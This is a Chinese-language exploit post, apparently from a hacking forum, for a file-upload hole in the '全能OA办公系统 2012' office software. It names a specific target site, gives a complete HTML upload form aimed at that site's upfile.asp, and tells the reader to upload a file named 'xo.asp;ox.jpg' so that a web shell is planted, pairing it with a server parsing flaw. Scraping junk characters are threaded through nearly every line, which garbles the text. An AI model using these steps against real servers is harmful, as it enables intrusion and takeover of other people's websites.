全能OA办公系统 上传漏洞
" ]- k/ u6 X3 A$ l- g
" D: B$ D# n7 C/ D9 H; U( Y系统介绍:+ ?3 l9 h" S! R
, Y* } j1 s; l$ l全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。9 W2 X/ E2 z, J/ j/ F7 W' ?& Y" f
3 o8 W8 e) o1 w9 {9 x$ f U) h' d' Y主要功能:
- S. i% E7 N. j" T: K# W公司通告 - `" V9 w' r) h% {/ K/ c _# T
工作计划 5 v, P' U" W3 t* @
通讯助理 0 I3 u0 D% f$ W8 X9 e; j* X1 l
客户资源 : U' t" [9 v' _
我的公文
# B. T$ |8 ~4 U7 l公文传阅
7 l U0 E" [/ H1 k) R& t公共资源
# ?5 f; c8 y8 s! z8 n0 Z资源预约
! ^0 B0 z' @. P- \' }. z今日考勤
0 y; M" J% U$ h2 x% Q个人计划 + t+ ]# _0 C7 G8 x
个人通讯录 2 R0 @' k r2 p
个人基本档案 w) |! }& O+ b8 Y$ C
未读邮件 8 A$ E# w1 g* {& W1 ]
发邮件 8 P6 n) ~$ L. M& H# a( W- B
收件夹 + Z) C. v" Z$ I/ z" s$ J; y
寄件夹
; t& }8 D- r' ^6 P7 s5 s$ p网络硬盘
: _/ p- K* m0 V h+ x9 Z网络会议 ; y) ~5 R/ h2 C; A
网络调查 ' M4 t; z: D# F/ _& a
交流论坛
" Y2 k1 J; E, l' s" n. Y, E+ v2 b3 a# {1 ]% X
有兴趣测试的朋友可以下源码看看
2 ]6 ?; a2 r8 G/ C$ h% {* s, w8 E
8 j1 ^2 i% A# G4 _9 D8 ^/ J: l3 h源码下载:
8 c/ }4 Q! H0 I; a# B( L, ~4 I! E& k( l- D! X
http://www.mycodes.net/30/4750.htm
1 ]% Y2 [5 a* h4 {: C- g2 v, _% p$ N5 l, g$ T/ ~( u" ^" r7 g9 |" A$ z/ T
漏洞介绍:
* k4 `6 k% l! }; n! t
! o8 B8 @6 A$ e* {/ n由upfile.asp上传文件漏洞引起/ t c) c0 F# B( @
0 u; z& G) z% \$ P1 ]2 k& `
测试方法:- I+ i; G+ @1 E I
6 f$ O0 B" T; S {1 P使用名小子上传http://www.itlynn.com/upfile.asp即可
9 }8 v3 X, W& W( {" w) `
! f, }# A0 `$ u& S; T7 N: H& [$ }如果upfile.asp文件被删除不存在。7 w5 G/ c9 d5 ?" B3 M- L7 X( p
5 ^3 N7 z2 z. Q
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。$ }; R& _2 w8 n7 l9 z
, A: U% }9 \. H* b) c0 o- j如果存在那么将如下代码保存为upfile.html。7 Z a( e9 n4 U# p& a
+ ~& q" e( v% h0 \然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。9 ?6 l6 q. a+ X, R* B" x) e; [/ I
4 k' r( u: F2 G5 o" T& _1 } 8 O+ q1 f( Q5 _6 d
, A( A# ^' L* v5 o! e2 f% f
01 <table border='0' align="center" cellpadding="5">
' P" d2 l9 S5 k1 Z0 v" \( g
, B) U1 ^0 S3 h3 i8 l$ E8 O: \# f02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> * }, X I' Q% u x7 o6 V- Q
+ }" H5 J9 c! G3 P5 t x9 _& ^
03 <tr> ( P; b4 E6 O" ~0 q( G( \7 x
" ^# b3 i; i$ T5 q' P
04 <td>报错:</td>
i4 T0 F9 _) |+ V
5 g) h$ T, \& S7 A+ M05 <td><input type='radio' name='errnumber' value='0'> & O/ Y7 G. s" J: R) G1 d o
: K$ N& `- y" L/ w5 H
06 自动更名
9 T I& l) Z8 X& x+ q" z. x" ^# j7 m" I+ |/ O( z
07 <input type='radio' name='errnumber' value='1' checked> $ z: |7 u/ r5 {( x% ^% v) w( U
! S8 t/ n/ q5 a' r
08 报错方式
; x: y5 a) e( u5 z" o; Z x
# w: U' v7 {' z& _6 T/ \09 <input type='radio' name='errnumber' value='2'>
) M- _+ P& X: T' I( S
# t) p" X" Z0 p4 i& q0 m5 Z9 d10 直接覆盖</td> 9 ]% r/ s4 _4 I2 D
0 \$ V7 r# C3 i3 _1 _11 </tr>
, T# s5 ~7 E8 N. m# V" V
. P* U4 r9 ?) E; I12 <tr> g9 H* a6 l T3 N" f" @. B3 ~$ L
9 D$ O7 e1 A; x) s
13 <td>主题:</td>
2 Y3 u: W* K$ W1 a+ o- ?
% B. \' Q- T+ t: T5 p. d1 K. ?14 <td><input type='text' name='filename' size='30'></td>
9 G, r( R6 k/ v% @: X8 I+ d- `$ U: l* O9 s; @# S1 j4 w
15 </tr>
4 c1 k, J+ b: e% B: A$ a D+ o4 S
' ~0 G% q4 v+ ?7 a9 H) j5 `16 <tr>
( @ ?$ R' `6 g# a2 T! G) l0 o4 p1 ]! Z# Z0 O$ q" V
17 <td>文件:</td> ; r% P/ s2 G1 q+ f1 `6 X
4 {0 p4 J Y/ e; y4 a
18 <td><input type="file"name="fruit"size="30"></td> ! y4 ~! I4 h: y" J+ a
# N; L: ~/ i5 t8 F; Q
19 </tr> o3 \% t* F; U
. t% c5 q; v' |( R20 <tr>
# O; ?' l1 I# Q- u( @8 w
; C g% w. s+ {, L% Q/ s" W, x21 <td valign='top'>简介:</td> % J- d# T$ v U! u# W& i
: w* Q: I) z4 k2 \9 }0 b1 M22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> + O; B8 v3 F$ P) x, [& F
0 j: m+ g* ^; y1 m! N" z
23 </tr>
! P. ^# _; P0 L0 W7 c- `" o$ c) @ Z( {/ V7 y- R
24
& p# I: Z) g: t! _6 P# }& J; `+ A- i- h
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
" ]) I6 [, [2 d* H& ~9 |. U0 m4 S2 |4 _ Z0 S* U& r
26 </tr>
( [1 j! p3 j8 B* O; M2 f A
$ f5 c! T. Z" ^7 K/ D% \8 m; {27 </form>
- N( W$ j) c* {0 l3 B9 t* X; S0 L* y1 A$ Y: t6 h
然后打开上传一个文件名为xo.asp;ox.jpg的文件。: X* R- L/ l7 `+ v
! \% R! b8 ~' Q8 M& Y) A# r8 K $ B. T& Z4 ^) d" c* M+ O
i7 T5 k" r( D2 H, y/ k
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
1 r6 r8 s$ `/ M) {; a/ u$ i! f- n9 V* @5 j
此漏洞需要配合解析漏洞利用。
7 U5 D$ s/ |; u. S8 q% J/ g: _9 _ G
|